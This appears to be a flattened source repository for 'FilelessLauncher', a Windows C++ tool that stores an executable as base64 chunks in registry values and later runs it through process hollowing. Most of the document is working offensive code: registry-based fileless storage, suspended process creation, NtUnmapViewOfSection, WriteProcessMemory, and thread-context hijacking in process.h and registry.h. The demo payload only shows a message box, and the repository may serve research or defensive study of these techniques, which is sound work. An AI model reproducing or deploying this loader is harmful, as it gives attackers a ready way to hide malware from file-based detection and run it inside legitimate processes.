├── FilelessLauncher
├── DummyProcess
│ ├── DummyProcess.cpp
│ ├── DummyProcess.h
│ ├── DummyProcess.ico
│ ├── DummyProcess.rc
│ ├── DummyProcess.vcxproj
│ ├── DummyProcess.vcxproj.filters
│ ├── ReadMe.txt
│ ├── Resource.h
│ ├── small.ico
│ ├── stdafx.cpp
│ ├── stdafx.h
│ └── targetver.h
├── FilelessLauncher.opensdf
├── FilelessLauncher.sdf
├── FilelessLauncher.sln
├── FilelessLauncher
│ ├── FilelessLauncher.vcxproj
│ ├── FilelessLauncher.vcxproj.filters
│ ├── FilelessLauncher.vcxproj.user
│ ├── Source.cpp
│ ├── base64.h
│ ├── common.h
│ ├── filereader.h
│ ├── process.h
│ └── registry.h
├── ReplacementProcess
│ ├── ReplacementProcess.vcxproj
│ ├── ReplacementProcess.vcxproj.filters
│ └── Source.cpp
└── Sample
│ ├── DummyProcess.exe
│ ├── FilelessLauncher.exe
│ ├── ReplacementProcess.exe
│ ├── execute.bat
│ └── write.bat
├── LICENSE
└── README.md
/FilelessLauncher/DummyProcess/DummyProcess.cpp:
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1 | // DummyProcess.cpp : Defines the entry point for the application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "DummyProcess.h"
6 |
7 | #define MAX_LOADSTRING 100
8 |
9 | // Global Variables:
10 | HINSTANCE hInst; // current instance
11 | TCHAR szTitle[MAX_LOADSTRING]; // The title bar text
12 | TCHAR szWindowClass[MAX_LOADSTRING]; // the main window class name
13 |
14 | // Forward declarations of functions included in this code module:
15 | ATOM MyRegisterClass(HINSTANCE hInstance);
16 | BOOL InitInstance(HINSTANCE, int);
17 | LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
18 | INT_PTR CALLBACK About(HWND, UINT, WPARAM, LPARAM);
19 |
20 | int APIENTRY _tWinMain(_In_ HINSTANCE hInstance,
21 | _In_opt_ HINSTANCE hPrevInstance,
22 | _In_ LPTSTR lpCmdLine,
23 | _In_ int nCmdShow)
24 | {
25 | UNREFERENCED_PARAMETER(hPrevInstance);
26 | UNREFERENCED_PARAMETER(lpCmdLine);
27 |
28 | // TODO: Place code here.
29 | MSG msg;
30 | HACCEL hAccelTable;
31 |
32 | // Initialize global strings
33 | LoadString(hInstance, IDS_APP_TITLE, szTitle, MAX_LOADSTRING);
34 | LoadString(hInstance, IDC_DUMMYPROCESS, szWindowClass, MAX_LOADSTRING);
35 | MyRegisterClass(hInstance);
36 |
37 | // Perform application initialization:
38 | if (!InitInstance (hInstance, nCmdShow))
39 | {
40 | return FALSE;
41 | }
42 |
43 | hAccelTable = LoadAccelerators(hInstance, MAKEINTRESOURCE(IDC_DUMMYPROCESS));
44 |
45 | // Main message loop:
46 | while (GetMessage(&msg, NULL, 0, 0))
47 | {
48 | if (!TranslateAccelerator(msg.hwnd, hAccelTable, &msg))
49 | {
50 | TranslateMessage(&msg);
51 | DispatchMessage(&msg);
52 | }
53 | }
54 |
55 | return (int) msg.wParam;
56 | }
57 |
58 |
59 |
60 | //
61 | // FUNCTION: MyRegisterClass()
62 | //
63 | // PURPOSE: Registers the window class.
64 | //
65 | ATOM MyRegisterClass(HINSTANCE hInstance)
66 | {
67 | WNDCLASSEX wcex;
68 |
69 | wcex.cbSize = sizeof(WNDCLASSEX);
70 |
71 | wcex.style = CS_HREDRAW | CS_VREDRAW;
72 | wcex.lpfnWndProc = WndProc;
73 | wcex.cbClsExtra = 0;
74 | wcex.cbWndExtra = 0;
75 | wcex.hInstance = hInstance;
76 | wcex.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(IDI_DUMMYPROCESS));
77 | wcex.hCursor = LoadCursor(NULL, IDC_ARROW);
78 | wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
79 | wcex.lpszMenuName = MAKEINTRESOURCE(IDC_DUMMYPROCESS);
80 | wcex.lpszClassName = szWindowClass;
81 | wcex.hIconSm = LoadIcon(wcex.hInstance, MAKEINTRESOURCE(IDI_SMALL));
82 |
83 | return RegisterClassEx(&wcex);
84 | }
85 |
86 | //
87 | // FUNCTION: InitInstance(HINSTANCE, int)
88 | //
89 | // PURPOSE: Saves instance handle and creates main window
90 | //
91 | // COMMENTS:
92 | //
93 | // In this function, we save the instance handle in a global variable and
94 | // create and display the main program window.
95 | //
96 | BOOL InitInstance(HINSTANCE hInstance, int nCmdShow)
97 | {
98 | HWND hWnd;
99 |
100 | hInst = hInstance; // Store instance handle in our global variable
101 |
102 | hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW,
103 | CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);
104 |
105 | if (!hWnd)
106 | {
107 | return FALSE;
108 | }
109 |
110 | ShowWindow(hWnd, nCmdShow);
111 | UpdateWindow(hWnd);
112 |
113 | return TRUE;
114 | }
115 |
116 | //
117 | // FUNCTION: WndProc(HWND, UINT, WPARAM, LPARAM)
118 | //
119 | // PURPOSE: Processes messages for the main window.
120 | //
121 | // WM_COMMAND - process the application menu
122 | // WM_PAINT - Paint the main window
123 | // WM_DESTROY - post a quit message and return
124 | //
125 | //
126 | LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
127 | {
128 | int wmId, wmEvent;
129 | PAINTSTRUCT ps;
130 | HDC hdc;
131 |
132 | switch (message)
133 | {
134 | case WM_COMMAND:
135 | wmId = LOWORD(wParam);
136 | wmEvent = HIWORD(wParam);
137 | // Parse the menu selections:
138 | switch (wmId)
139 | {
140 | case IDM_ABOUT:
141 | DialogBox(hInst, MAKEINTRESOURCE(IDD_ABOUTBOX), hWnd, About);
142 | break;
143 | case IDM_EXIT:
144 | DestroyWindow(hWnd);
145 | break;
146 | default:
147 | return DefWindowProc(hWnd, message, wParam, lParam);
148 | }
149 | break;
150 | case WM_PAINT:
151 | hdc = BeginPaint(hWnd, &ps);
152 | // TODO: Add any drawing code here...
153 | EndPaint(hWnd, &ps);
154 | break;
155 | case WM_DESTROY:
156 | PostQuitMessage(0);
157 | break;
158 | default:
159 | return DefWindowProc(hWnd, message, wParam, lParam);
160 | }
161 | return 0;
162 | }
163 |
164 | // Message handler for about box.
165 | INT_PTR CALLBACK About(HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam)
166 | {
167 | UNREFERENCED_PARAMETER(lParam);
168 | switch (message)
169 | {
170 | case WM_INITDIALOG:
171 | return (INT_PTR)TRUE;
172 |
173 | case WM_COMMAND:
174 | if (LOWORD(wParam) == IDOK || LOWORD(wParam) == IDCANCEL)
175 | {
176 | EndDialog(hDlg, LOWORD(wParam));
177 | return (INT_PTR)TRUE;
178 | }
179 | break;
180 | }
181 | return (INT_PTR)FALSE;
182 | }
183 |
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/FilelessLauncher/DummyProcess/DummyProcess.h:
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2 |
3 | #include "resource.h"
4 |
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1 | ========================================================================
2 | WIN32 APPLICATION : DummyProcess Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DummyProcess application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DummyProcess application.
9 |
10 |
11 | DummyProcess.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DummyProcess.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DummyProcess.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | AppWizard has created the following resources:
29 |
30 | DummyProcess.rc
31 | This is a listing of all of the Microsoft Windows resources that the
32 | program uses. It includes the icons, bitmaps, and cursors that are stored
33 | in the RES subdirectory. This file can be directly edited in Microsoft
34 | Visual C++.
35 |
36 | Resource.h
37 | This is the standard header file, which defines new resource IDs.
38 | Microsoft Visual C++ reads and updates this file.
39 |
40 | DummyProcess.ico
41 | This is an icon file, which is used as the application's icon (32x32).
42 | This icon is included by the main resource file DummyProcess.rc.
43 |
44 | small.ico
45 | This is an icon file, which contains a smaller version (16x16)
46 | of the application's icon. This icon is included by the main resource
47 | file DummyProcess.rc.
48 |
49 | /////////////////////////////////////////////////////////////////////////////
50 | Other standard files:
51 |
52 | StdAfx.h, StdAfx.cpp
53 | These files are used to build a precompiled header (PCH) file
54 | named DummyProcess.pch and a precompiled types file named StdAfx.obj.
55 |
56 | /////////////////////////////////////////////////////////////////////////////
57 | Other notes:
58 |
59 | AppWizard uses "TODO:" comments to indicate parts of the source code you
60 | should add to or customize.
61 |
62 | /////////////////////////////////////////////////////////////////////////////
63 |
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2 | // Microsoft Visual C++ generated include file.
3 | // Used by DummyProcess.rc
4 | //
5 |
6 | #define IDS_APP_TITLE 103
7 |
8 | #define IDR_MAINFRAME 128
9 | #define IDD_DUMMYPROCESS_DIALOG 102
10 | #define IDD_ABOUTBOX 103
11 | #define IDM_ABOUT 104
12 | #define IDM_EXIT 105
13 | #define IDI_DUMMYPROCESS 107
14 | #define IDI_SMALL 108
15 | #define IDC_DUMMYPROCESS 109
16 | #define IDC_MYICON 2
17 | #ifndef IDC_STATIC
18 | #define IDC_STATIC -1
19 | #endif
20 | // Next default values for new objects
21 | //
22 | #ifdef APSTUDIO_INVOKED
23 | #ifndef APSTUDIO_READONLY_SYMBOLS
24 |
25 | #define _APS_NO_MFC 130
26 | #define _APS_NEXT_RESOURCE_VALUE 129
27 | #define _APS_NEXT_COMMAND_VALUE 32771
28 | #define _APS_NEXT_CONTROL_VALUE 1000
29 | #define _APS_NEXT_SYMED_VALUE 110
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1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DummyProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
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1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 |
14 | // C RunTime Header Files
15 | #include
16 | #include
17 | #include
18 | #include
19 |
20 |
21 | // TODO: reference additional headers your program requires here
22 |
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4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
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1 | #include "base64.h"
2 | #include "registry.h"
3 | #include "filereader.h"
4 | #include "process.h"
5 |
6 | #include
7 |
8 | void WriteFileToRegistry(const char * const pFilePath)
9 | {
10 | HKEY hKey = OpenRegistryKey("RegistryTest");
11 |
12 | std::string strSubName = "Part";
13 | std::string strSizeName = "Size";
14 | size_t ulIndex = 1;
15 |
16 | auto splitFile = SplitFile(pFilePath);
17 | for (size_t i = 0; i < splitFile.size(); ++i)
18 | {
19 | std::string strFullName(strSubName + std::to_string(ulIndex));
20 |
21 | WriteRegistryKeyString(hKey, strFullName.c_str(), splitFile[i].data(), READ_WRITE_SIZE);
22 | ++ulIndex;
23 | }
24 |
25 | CloseHandle(hKey);
26 | }
27 |
28 | void ExecuteFileFromRegistry(const char * const pValueName)
29 | {
30 | HKEY hKey = OpenRegistryKey("RegistryTest");
31 |
32 | auto newProcessInfo = JoinRegistryToFile("RegistryTest", pValueName);
33 | auto processInfo = MapTargetProcess(newProcessInfo, "DummyProcess.exe");
34 | RunTargetProcess(newProcessInfo, processInfo);
35 |
36 | CloseHandle(hKey);
37 | }
38 |
39 | int main(int argc, char *argv[])
40 | {
41 |
42 | if (argc != 3)
43 | {
44 | fprintf(stderr, "Usage: \n"
45 | "%s w \"\"\n"
46 | "%s e \"\"\n",
47 | argv[0], argv[0]);
48 | exit(-1);
49 | }
50 |
51 | switch (*argv[1])
52 | {
53 | case 'w':
54 | WriteFileToRegistry(argv[2]);
55 | break;
56 |
57 | case 'e':
58 | ExecuteFileFromRegistry(argv[2]);
59 | break;
60 |
61 | default:
62 | fprintf(stderr, "Unrecognized option. Must be w or e.\n");
63 | exit(-1);
64 | }
65 |
66 | return 0;
67 | }
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1 | #pragma once
2 |
3 | #define BOOLIFY(x) !!(x)
4 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
5 |
6 | typedef struct
7 | {
8 | IMAGE_DOS_HEADER *pDosHeader;
9 | IMAGE_NT_HEADERS *pNtHeaders;
10 | IMAGE_SECTION_HEADER *pSectionHeader;
11 | std::unique_ptr pFileData;
12 | DWORD dwFileSize;
13 | } NewProcessInfo;
14 |
15 | const unsigned int READ_WRITE_SIZE = 2048;
16 |
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1 | #pragma once
2 |
3 | #include
4 | #include
5 | #include
6 | #include "common.h"
7 |
8 | NewProcessInfo GetTargetInfo(const LPCSTR lpPath)
9 | {
10 | NewProcessInfo processInfo = { 0 };
11 |
12 | HANDLE hFile = CreateFileA(lpPath, GENERIC_READ, FILE_SHARE_READ,
13 | nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
14 | DWORD dwFileSize = GetFileSize(hFile, nullptr);
15 |
16 | if (dwFileSize == -1)
17 | {
18 | fprintf(stderr, "Could not get size of file. Error = %X\n", GetLastError());
19 | exit(-1);
20 | }
21 |
22 | processInfo.pFileData = std::unique_ptr(new BYTE[dwFileSize]);
23 | processInfo.dwFileSize = dwFileSize;
24 |
25 | DWORD dwBytesRead = 0;
26 | bool bRet = BOOLIFY(ReadFile(hFile, processInfo.pFileData.get(), dwFileSize, &dwBytesRead, nullptr));
27 | if (!bRet)
28 | {
29 | fprintf(stderr, "Could not read file. Error = %X\n", GetLastError());
30 | exit(-1);
31 | }
32 | if (dwBytesRead != dwFileSize)
33 | {
34 | fprintf(stderr, "Could not complete entire read.\n"
35 | "Bytes read = %ul -- Bytes that should be read = %ul\n",
36 | dwBytesRead, dwFileSize);
37 | exit(-1);
38 | }
39 |
40 | processInfo.pDosHeader = (IMAGE_DOS_HEADER *)&(processInfo.pFileData.get()[0]);
41 | processInfo.pNtHeaders = (IMAGE_NT_HEADERS *)&(processInfo.pFileData.get()[processInfo.pDosHeader->e_lfanew]);
42 |
43 | CloseHandle(hFile);
44 |
45 | return processInfo;
46 | }
47 |
48 | std::vector> SplitFile(const char * const pFilePath)
49 | {
50 | std::vector> splitFile;
51 |
52 | NewProcessInfo newProcessInfo = GetTargetInfo(pFilePath);
53 | for (DWORD i = 0; i < newProcessInfo.dwFileSize; i += READ_WRITE_SIZE)
54 | {
55 | std::array splitArray = { 0 };
56 | memcpy(splitArray.data(), &newProcessInfo.pFileData.get()[i], READ_WRITE_SIZE);
57 |
58 | splitFile.push_back(splitArray);
59 | }
60 |
61 | return splitFile;
62 | }
63 |
64 |
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/FilelessLauncher/FilelessLauncher/process.h:
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1 | #pragma once
2 |
3 | #include
4 | #include
5 | #include "common.h"
6 | #include "filereader.h"
7 |
8 | using pNtUnmapViewOfSection = NTSTATUS (WINAPI *)(HANDLE hProcess, PVOID pBaseAddress);
9 | pNtUnmapViewOfSection NtUnmapViewOfSection = nullptr;
10 |
11 | const PROCESS_INFORMATION MapTargetProcess(NewProcessInfo &newProcessInfo, const LPSTR strDummyProcessPath)
12 | {
13 | PROCESS_INFORMATION processInfo = { 0 };
14 | STARTUPINFOA startupInfo = { 0 };
15 |
16 | NtUnmapViewOfSection = (pNtUnmapViewOfSection)GetProcAddress(
17 | GetModuleHandle(L"ntdll.dll"), "NtUnmapViewOfSection");
18 | if (NtUnmapViewOfSection == nullptr)
19 | {
20 | fprintf(stderr, "Could not locate NtUnmapViewOfSection.\n");
21 | exit(-1);
22 | }
23 |
24 | bool bRet = BOOLIFY(CreateProcessA(nullptr, strDummyProcessPath, nullptr, nullptr, FALSE, CREATE_SUSPENDED,
25 | nullptr, nullptr, &startupInfo, &processInfo));
26 | if (!bRet)
27 | {
28 | fprintf(stderr, "Could not create dummy process. Error = %X\n",
29 | GetLastError());
30 | exit(-1);
31 | }
32 |
33 | DWORD_PTR dwImageBase = newProcessInfo.pNtHeaders->OptionalHeader.ImageBase;
34 | SIZE_T ulImageSize = newProcessInfo.pNtHeaders->OptionalHeader.SizeOfImage;
35 | DWORD dwHeaderSize = newProcessInfo.pNtHeaders->OptionalHeader.SizeOfHeaders;
36 | WORD wNumberOfSections = newProcessInfo.pNtHeaders->FileHeader.NumberOfSections;
37 |
38 | NTSTATUS ntStatus = NtUnmapViewOfSection(processInfo.hProcess, (PVOID)dwImageBase);
39 | if (!NT_SUCCESS(ntStatus))
40 | {
41 | fprintf(stderr, "Could not unmap view of dummy process. Nt Status = %X\n",
42 | ntStatus);
43 | fprintf(stderr, "Check DEP and ASLR settings on the target process. This example code "
44 | "does not provide a solution that maps into a DEP/ASLR enabled process.\n");
45 | exit(-1);
46 | }
47 |
48 | LPVOID lpAllocBase = VirtualAllocEx(processInfo.hProcess, (LPVOID)dwImageBase, ulImageSize,
49 | MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
50 | if ((DWORD_PTR)lpAllocBase != dwImageBase)
51 | {
52 | fprintf(stderr, "Could not allocate base address of target process into hollow process. Error = %X\n",
53 | GetLastError());
54 | exit(-1);
55 | }
56 |
57 | DWORD dwBytesWritten = 0;
58 | bRet = BOOLIFY(WriteProcessMemory(processInfo.hProcess, (LPVOID)dwImageBase, newProcessInfo.pFileData.get(),
59 | dwHeaderSize, &dwBytesWritten));
60 | if (dwBytesWritten != dwHeaderSize)
61 | {
62 | fprintf(stderr, "Could not write in PE header of replacement process. Error = %X\n",
63 | GetLastError());
64 | exit(-1);
65 | }
66 |
67 | for (auto i = 0; i < wNumberOfSections; ++i)
68 | {
69 | int iSectionOffset = newProcessInfo.pDosHeader->e_lfanew
70 | + sizeof(IMAGE_NT_HEADERS) + (sizeof(IMAGE_SECTION_HEADER) * i);
71 | newProcessInfo.pSectionHeader = (IMAGE_SECTION_HEADER *)&(newProcessInfo.pFileData.get()[iSectionOffset]);
72 |
73 | bRet = BOOLIFY(WriteProcessMemory(processInfo.hProcess,
74 | (LPVOID)(dwImageBase + newProcessInfo.pSectionHeader->VirtualAddress),
75 | &newProcessInfo.pFileData.get()[newProcessInfo.pSectionHeader->PointerToRawData],
76 | newProcessInfo.pSectionHeader->SizeOfRawData, &dwBytesWritten));
77 | if (!bRet)
78 | {
79 | fprintf(stderr, "Could not write in section to target process. Error = %X\n",
80 | GetLastError());
81 | exit(-1);
82 | }
83 | }
84 |
85 | return processInfo;
86 | }
87 |
88 | void RunTargetProcess(const NewProcessInfo &newProcessInfo, const PROCESS_INFORMATION &processInfo)
89 | {
90 | CONTEXT ctx = { CONTEXT_FULL };
91 | BOOL bRet = BOOLIFY(GetThreadContext(processInfo.hThread, &ctx));
92 | if (!bRet)
93 | {
94 | fprintf(stderr, "Could not get thread context. Error = %X\n", GetLastError());
95 | exit(-1);
96 | }
97 |
98 | ctx.Eax = newProcessInfo.pNtHeaders->OptionalHeader.ImageBase
99 | + newProcessInfo.pNtHeaders->OptionalHeader.AddressOfEntryPoint;
100 | bRet = BOOLIFY(SetThreadContext(processInfo.hThread, &ctx));
101 | if (!bRet)
102 | {
103 | fprintf(stderr, "Could not set thread context. Error = %X\n", GetLastError());
104 | exit(-1);
105 | }
106 |
107 | (void)ResumeThread(processInfo.hThread);
108 |
109 | }
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1 | #pragma once
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
10 | #include "common.h"
11 |
12 | const HKEY OpenRegistryKey(const char * const strKeyName, const bool bCreate = true)
13 | {
14 | HKEY hKey = nullptr;
15 | DWORD dwResult = 0;
16 |
17 | LONG lRet = RegCreateKeyExA(HKEY_CURRENT_USER, strKeyName, 0,
18 | nullptr, 0, KEY_READ | KEY_WRITE | KEY_CREATE_SUB_KEY,
19 | nullptr, &hKey, &dwResult);
20 | if (lRet != ERROR_SUCCESS)
21 | {
22 | fprintf(stderr, "Could not create/open registry key. Error = %X\n",
23 | lRet);
24 | exit(-1);
25 | }
26 |
27 | if (bCreate && dwResult == REG_CREATED_NEW_KEY)
28 | {
29 | fprintf(stdout, "Created new registry key.\n");
30 | }
31 | else
32 | {
33 | fprintf(stdout, "Opened existing registry key.\n");
34 | }
35 |
36 | return hKey;
37 | }
38 |
39 | void WriteRegistryKeyString(const HKEY hKey, const char * const strValueName,
40 | const BYTE *pBytes, const DWORD dwSize)
41 | {
42 | std::string strEncodedData = base64_encode(pBytes, dwSize);
43 |
44 | LONG lRet = RegSetValueExA(hKey, strValueName, 0, REG_SZ, (const BYTE *)strEncodedData.c_str(), strEncodedData.length());
45 | if (lRet != ERROR_SUCCESS)
46 | {
47 | fprintf(stderr, "Could not write registry value. Error = %X\n",
48 | lRet);
49 | exit(-1);
50 | }
51 | }
52 |
53 | const std::array ReadRegistryKeyString(const char * const strKeyName,
54 | const char * const strValueName, bool &bErrorOccured)
55 | {
56 | DWORD dwType = 0;
57 | const DWORD dwMaxReadSize = READ_WRITE_SIZE * 2;
58 | DWORD dwReadSize = dwMaxReadSize;
59 |
60 | char strBytesEncoded[READ_WRITE_SIZE * 2] = { 0 };
61 |
62 | LONG lRet = RegGetValueA(HKEY_CURRENT_USER, strKeyName, strValueName,
63 | RRF_RT_REG_SZ, &dwType, strBytesEncoded, &dwReadSize);
64 |
65 | std::array pBytes = { 0 };
66 | std::string strDecoded = base64_decode(std::string(strBytesEncoded));
67 | (void)memcpy(pBytes.data(), strDecoded.c_str(), strDecoded.size());
68 |
69 | if (lRet != ERROR_SUCCESS)
70 | {
71 | fprintf(stderr, "Could not read registry value. Error = %X\n",
72 | lRet);
73 | bErrorOccured = true;
74 | }
75 | if (dwType != REG_SZ || (dwReadSize == 0 || dwReadSize > dwMaxReadSize))
76 | {
77 | fprintf(stderr, "Did not correctly read back a string from the registry.\n");
78 | bErrorOccured = true;
79 | }
80 |
81 | return pBytes;
82 | }
83 |
84 | NewProcessInfo JoinRegistryToFile(const char * const strKeyName, const char * const strValueName)
85 | {
86 | NewProcessInfo newProcessInfo = { 0 };
87 | std::vector> splitFile;
88 |
89 | size_t ulKeyIndex = 1;
90 | std::string strFullName(strValueName + std::to_string(ulKeyIndex));
91 |
92 | bool bErrorOccured = false;
93 | auto partFile = ReadRegistryKeyString(strKeyName, strFullName.c_str(), bErrorOccured);
94 |
95 | while (!bErrorOccured)
96 | {
97 | splitFile.push_back(partFile);
98 |
99 | ++ulKeyIndex;
100 | strFullName = strValueName + std::to_string(ulKeyIndex);
101 |
102 | partFile = ReadRegistryKeyString(strKeyName, strFullName.c_str(), bErrorOccured);
103 | }
104 |
105 | newProcessInfo.pFileData = std::unique_ptr(new BYTE[splitFile.size() * READ_WRITE_SIZE]);
106 | memset(newProcessInfo.pFileData.get(), 0, splitFile.size() * READ_WRITE_SIZE);
107 |
108 | size_t ulWriteIndex = 0;
109 | for (auto &split : splitFile)
110 | {
111 | (void)memcpy(&newProcessInfo.pFileData.get()[ulWriteIndex * READ_WRITE_SIZE], splitFile[ulWriteIndex].data(),
112 | READ_WRITE_SIZE);
113 | ++ulWriteIndex;
114 | }
115 |
116 | newProcessInfo.pDosHeader = (IMAGE_DOS_HEADER *)&(newProcessInfo.pFileData.get()[0]);
117 | newProcessInfo.pNtHeaders = (IMAGE_NT_HEADERS *)&(newProcessInfo.pFileData.get()[newProcessInfo.pDosHeader->e_lfanew]);
118 |
119 | return newProcessInfo;
120 | }
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2 |
3 | int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
4 | LPSTR lpCmdLine, int nShowCmd)
5 | {
6 | MessageBox(0, L"Replacement process executing", L"Test", MB_ICONINFORMATION);
7 |
8 | return 0;
9 | }
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621 | How to Apply These Terms to Your New Programs
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